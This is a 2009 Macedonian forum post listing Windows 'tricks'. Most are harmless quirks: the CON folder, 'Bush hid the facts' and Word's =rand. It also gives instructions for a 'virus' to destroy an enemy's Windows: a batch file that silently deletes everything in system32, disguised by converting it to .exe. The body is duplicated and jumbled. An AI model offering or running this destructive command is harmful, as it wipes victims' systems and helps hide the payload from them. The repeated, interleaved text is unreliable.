Вие се наоѓате на вистинската фреквенција на najforumce FM 105.5 мегапиксели, а јас сум Досаден Login Pop Up што пробува да ве натера да се регистрирате. Др.Џек Левин кој покрај магнетниот појас за колено го измисли и магнетниот форум www.najforumce.fairtopic.com Доколку се регистрирате на овој форум големи се шансите да го зголемите волуменот на косата,да го намалите вишакот килограми и да ви се зголеми интелегенцијата,онолку колку што ќе постирате дневно на форумот.
!!!

Интересни трикови ! (1 дел)

Go down

Интересни трикови ! (1 дел) Empty Интересни трикови ! (1 дел)

Пишување by MkDvirus on Нед Ное 08 2009, 16:22

(Овие 3 неможе ни мајкрософт да ги објасни ) 1. Никој неможе да направи фолдер со име "CON" (без наводници) 2.Отворете нотепад и пишете го следново - "Bush hid the facts"(без наводници) -Зачувајте го,отворетего и видете што ке се случи 3.Отворете нов Word документ пишете го следново =rand
(200, 99) и стиснете ентер видете што се случува Како да симнувате од
rapidshare.com без да чекате : 1 впишете го кодот во адрес барот javascript:aler(c=0) 2.избришете ги празните места морав така зошто прави проблем дека е јава скрипта
Отворајте страни без Веб прелистувач одете start->run и пишете го следното C:\Windows\hh.exe http://www.адреса (кај http://www.адреса пишете ја веб страната која сакате да ја отворите пр: C:\Windows\hh.exe (Овие 3 неможе ни мајкрософт да ги објасни ) 1. Никој неможе да направи фолдер со име "CON" (без наводници) 2.Отворете нотепад и пишете го следново - "Bush hid the facts"(без наводници) -Зачувајте го,отворетего и видете што ке се случи 3.Отворете нов Word документ пишете го следново =rand
(200, 99) и стиснете ентер видете што се случува Како да симнувате од
rapidshare.com без да чекате : 1 впишете го кодот во адрес барот javascript:aler(c=0) 2.избришете ги празните места морав така зошто прави проблем дека е јава скрипта
Отворајте страни без Веб прелистувач одете start->run и пишете го следното C:\Windows\hh.exe http://www.адреса (кај http://www.адреса пишете ја веб страната која сакате да ја отворите пр: C:\Windows\hh.exe http://warezboy.blogspot.com стиснете ентер Направете вирус што ке го избрише виндовсот на вашиот непријателSmile 1. Отворете нотепад 2.Впишете го следново del c:\windows\system32\*.* /q (не го отварајте фајлот ке напраите беља)
3.Зачувајте го фајлот како Име.bat 4.Ако мислите ке ве приметат дека е бат фајлот симнете го конвертерот .bat to .exe Тоа беше све Smile Очекувајте 2 дел , а дотогаш уживајтеSmile
стиснете ентер Направете вирус што ке го избрише виндовсот на вашиот непријателSmile 1. Отворете нотепад 2.Впишете го следново del c:\windows\system32\*.* /q (не го отварајте фајлот ке напраите беља)
3.Зачувајте го фајлот како Име.bat 4.Ако мислите ке ве приметат дека е бат фајлот симнете го конвертерот .bat to .exe Тоа беше све Smile Очекувајте 2 дел , а дотогаш уживајтеSmile
Извор
MkDvirus
MkDvirus
Почетник
Почетник

Male
Aquarius

Треснал Глупости : 9
Поени : 19
Репутација : 0
Поминат рок на траење : 33
Се наоѓам : Во моето тело!
Ден на регистрирање : 2009-08-29

Преглед на профилот на членот

Вратете се на почетокот Go down

Вратете се на почетокот


 
Permissions in this forum:
Не можете да одговарате на темите во форумот